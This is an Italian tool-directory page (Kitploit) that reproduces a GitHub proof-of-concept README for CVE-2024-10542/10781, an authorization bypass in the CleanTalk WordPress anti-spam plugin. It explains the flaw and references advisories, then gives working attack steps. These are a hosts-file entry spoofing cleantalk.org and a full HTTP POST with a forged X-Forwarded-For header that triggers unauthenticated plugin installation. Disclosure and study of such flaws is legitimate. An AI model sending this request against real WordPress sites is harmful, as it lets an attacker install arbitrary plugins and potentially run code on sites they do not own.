Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/ubaydev/cve-2024-10542
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneApprendimento e Formazione
GitHububaydev/cve-2024-10542

CVE-2024-10542

WordPress Protezione antispam, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 è vulnerabile a Installazione non autenticata di plugin arbitrari

Vedi Repository
351 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC di CVE-2024-10542 e CVE-2024-10781 Autenticazione non funzionante nel plugin Spam protection, AntiSpam, FireWall di CleanTalk <= 6.43.2

Disclaimer:

Le informazioni fornite in questo documento relative a CVE-2024-10542 sono solo a scopo di apprendimento ed educazione. Non incoraggiamo né autorizziamo l'uso di queste informazioni per scopi dannosi, inclusi ma non limitati a sfruttamento, manomissione di sistemi o altre attività illegali.

Introduzione:

In un panorama digitale sempre più complesso, garantire la sicurezza dei siti web è fondamentale per molti proprietari. Recentemente sono state scoperte due vulnerabilità critiche che rappresentano una minaccia significativa per i siti WordPress. Queste vulnerabilità riguardano il noto plugin CleanTalk, che fornisce protezione antispam, misure antispam e un firewall. Cosa rende questa situazione ancora più urgente? Approfondiamo! Due vulnerabilità tracciate come CVE-2024-10542 e CVE-2024-10781 potrebbero consentire a un utente malintenzionato non autenticato di installare e attivare plugin malevoli su siti vulnerabili. Ciò non solo mette a rischio la reputazione del sito, ma apre anche la strada all'esecuzione di codice remoto. Con un punteggio CVSS di 9,8 su 10, è evidente che queste vulnerabilità rientrano nella categoria ad alto pericolo. Secondo Wordfence, entrambe le vulnerabilità riguardano un problema di bypass dell'autorizzazione che potrebbe consentire a un attore malintenzionato di installare e attivare plugin arbitrari. Questo potrebbe quindi aprire la strada all'esecuzione di codice remoto se il plugin attivato è a sua volta vulnerabile.

PoC:

Innanzitutto, gli utenti malintenzionati imposteranno il file hosts sui propri sistemi operativi:

127.0.0.1 cleantalk.org

dopodiché invieranno una richiesta come questa:

POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

spbc_remote_call_action=install_plugin&plugin_name=apbct

Conclusione:

La sicurezza informatica è una responsabilità condivisa da ogni proprietario di sito. Mantenendo i plugin aggiornati e rimanendo vigili sulle potenziali vulnerabilità, possiamo proteggere i nostri siti da attacchi malevoli. Assicurati di aver aggiornato CleanTalk all'ultima versione e di effettuare controlli periodici sugli altri plugin per garantire la massima sicurezza. Ricorda, piccoli passi possono prevenire disastri significativi!

Riferimenti:

  • https://thehackernews.com/2024/11/critical-wordpress-anti-spam-plugin.html
  • https://patchstack.com/database/vulnerability/cleantalk-spam-protect/wordpress-spam-protection-anti-spam-firewall-by-cleantalk-plugin-6-43-2-authorization-bypass-via-reverse-dns-spoofing-vulnerability
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect/spam-protection-anti-spam-firewall-by-cleantalk-6432-authorization-bypass-via-reverse-dns-spoofing-to-unauthenticated-arbitrary-plugin-installation
  • https://plugins.trac.wordpress.org/changeset/3179819/cleantalk-spam-protect#file631

Offrimi un caffè:

  • https://saweria.co/ubaii
  • https://buymeacoffee.com/ubaii
  • https://trakteer.id/ubaii

Ringraziamenti:

Allah, Muhammad SAW, mikemyers, Markdown Monster, la mia famiglia, tu?

Scarica lo strumento